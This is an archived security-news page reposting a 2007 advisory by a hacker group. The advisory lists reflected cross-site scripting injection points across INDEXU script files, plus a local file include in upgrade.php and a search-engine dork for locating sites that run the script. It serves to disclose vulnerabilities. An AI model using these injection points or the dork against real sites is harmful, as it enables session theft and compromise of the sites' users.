_
_ _ 09.06.2008
 
_ Navigation: _
Main Page Technology Downloads Security Entertainment Videos
Search Site: Advanced
_
 
Login Login
 
Register Register
   
_ News Item

indexu-xss.txt

Jan 22 2007 19:03:17
Source: ace
vote bad  vote good
0
vulnerability script indexu all versions
Found by :SwEET-DeViL & viP HaCkEr & HaCkEr sUn
TeaM AL-GaRNi
Application : indexu
version : all versions
URL : http://www.nicecoder.com/
google : "Powered by INDEXU 5."

Exploits :
|//1\\|
in upgrade.php
http://www.site.com/INDEXU_PATH/upgrade.php?pflag=upgrade&true&gateway=[XSS] ___or #../index.php
AND Local File Include~
##########################
|//2\\|
in suggest_category.php
http://www.site.com/INDEXU_PATH/suggest_category.php?error_msg=[XSS]
##########################
|//3\\|
in user_detail.php
http://www.site.com/INDEXU_PATH/user_detail.php?u=[XSS]
##########################
|//4\\|
in tell_friend.php
http://www.site.com/INDEXU_PATH/tell_friend.php?friend_name=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?friend_email=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?error_msg=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?my_name=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?my_email=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?id=[XSS]
##########################
|//5\\|
in sendmail.php
http://www.site.com/INDEXU_PATH/sendmail.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?email=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?name=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?subject=[XSS]
##########################
//6\\
in send_pwd.php
http://www.site.com/INDEXU_PATH/send_pwd.php?email=[XSS]
http://www.site.com/INDEXU_PATH/send_pwd.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/send_pwd.php?username=[XSS]
##########################
|//7\\|
in search.php
http://www.site.com/INDEXU_PATH/search.php?keyword=[XSS]
##########################
|//8\\|
http://www.site.com/INDEXU_PATH/register.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/register.php?username=[XSS]
http://www.site.com/INDEXU_PATH/register.php?password=[XSS]
http://www.site.com/INDEXU_PATH/register.php?password2=[XSS]
http://www.site.com/INDEXU_PATH/register.php?email=[XSS]
##########################
|//9\\|
power_search.php
http://www.site.com/INDEXU_PATH/power_search.php?url=[XSS]
http://www.site.com/INDEXU_PATH//power_search.php?contact_name=[XSS]
http://www.site.com/INDEXU_PATH//power_search.php?email=[XSS]
##########################
|//10\\|
in new.php
http://www.site.com/INDEXU_PATH/new.php?path=[XSS]
http://www.site.com/INDEXU_PATH//new.php?total=[XSS]
##########################
|//11\\|
in modify.php
http://www.site.com/INDEXU_PATH/modify.php?pflag=search&query=[XSS]
##########################
|//12\\|
in mailing_list.php
http://www.site.com/INDEXU_PATH/mailing_list.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/mailing_list.php?email=[XSS]
##########################
|//13\\|
in login.php
http://www.site.com/INDEXU_PATH/login.php?error_msg=[XSS]
##########################
|//...$...\\|
There is another vulnerability in the program, a XSS
:::::::::::::::::::::::::::::::::
:: ########### ########### ::
:: ########### ########### ::
:: ### ### ### ::
:: ### ########### ::
:: ### ###### ########### ::
:: ### ## ### == ### ### ::
:: ### ### == ### ### ::
:: ############ ### ### ::
:: ############ ### ### ::
:::::::::::::::::::::::::::::::::
##########################
#####gamr-14@hotmail.com##
#####Error@msn.com########
########(c)2007###########

» full story @ source-link: ace
Related Articles:
» Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit
» S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit
» PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit
» SendStudio <= 2004.14 (ROOTDIR) Remote File Inclusion Vulnerability
_ Comments
Add Comment
You must be registered and logged in to add comments!

Register
Login
_ Sponsors

_ Sponsors